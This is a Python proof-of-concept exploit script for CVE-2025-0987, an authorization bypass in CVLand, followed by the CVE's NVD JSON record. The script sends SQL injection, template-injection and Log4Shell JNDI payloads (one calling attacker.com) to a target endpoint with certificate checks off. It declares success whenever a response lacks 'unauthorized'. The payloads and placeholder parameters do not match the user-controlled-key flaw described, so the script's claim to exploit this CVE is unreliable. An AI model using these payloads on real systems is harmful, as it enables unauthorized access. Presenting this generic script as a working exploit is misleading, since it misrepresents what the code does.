CVE-2025-0987

# CVE-2025-0987 PoC - CVLand Authorization Bypass via Parameter Injection # Description: The vulnerability allows attackers to bypass authorization checks # by manipulating user-controlled keys in CVLand application parameters import requests import json TARGET_URL = "https://target-cvland-server.com" CVE_ID = "CVE-2025-0987" def exploit_authorization_bypass(): """ Exploit for Authorization Bypass Through User-Controlled Key in CVLand via Parameter Injection """ print(f"[*] Exploiting {CVE_ID} - CVLand Parameter Injection") # Step 1: Identify the vulnerable endpoint and parameter # The application uses user-controlled keys that can be manipulated vulnerable_params = { 'user_id': 'ATTACKER_CONTROLLED_VALUE', 'auth_token': 'manipulated_token', 'access_key': 'bypass_key_injection' } # Step 2: Send malicious request with parameter injection # Inject authorization bypass payload into user-controlled parameters inject_payloads = [ "' OR '1'='1", "admin'--", "{{constructor}}", "${jndi:ldap://attacker.com/exploit}" ] for payload in inject_payloads: print(f"[*] Testing payload: {payload}") exploit_data = { 'key': payload, 'action': 'view', 'resource_id': '1' } try: response = requests.post( f"{TARGET_URL}/api/endpoint", data=exploit_data, headers={ 'User-Agent': f'Mozilla/5.0 - {CVE_ID} Exploit', 'Content-Type': 'application/x-www-form-urlencoded' }, timeout=10, verify=False ) # Check for successful bypass indicators if response.status_code == 200 and 'unauthorized' not in response.text.lower(): print(f"[!] Potential authorization bypass detected!") print(f"[+] Response: {response.text[:500]}") return True except requests.RequestException as e: print(f"[-] Request failed: {e}") return False if __name__ == "__main__": print(f"[*] CVE-2025-0987 CVLand Authorization Bypass Exploit") result = exploit_authorization_bypass() if result: print("[+] Exploit successful - Authorization bypass achieved") else: print("[-] Exploit may have failed - Verify manually")

{"cve": {"id": "CVE-2025-0987", "sourceIdentifier": "[email protected]", "published": "2025-11-03T12:15:33.383", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [{"sourceIdentifier": "[email protected]", "tags": ["unsupported-when-assigned"]}], "descriptions": [{"lang": "en", "value": "Authorization Bypass Through User-Controlled Key vulnerability in CB Project Ltd. Co. CVLand allows Parameter Injection.This issue affects CVLand: from 2.1.0 through 20251103. NOTE: The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:L", "baseScore": 9.9, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.1, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "references": [{"url": "https://www.usom.gov.tr/bildirim/tr-25-0371", "source": "[email protected]"}]}}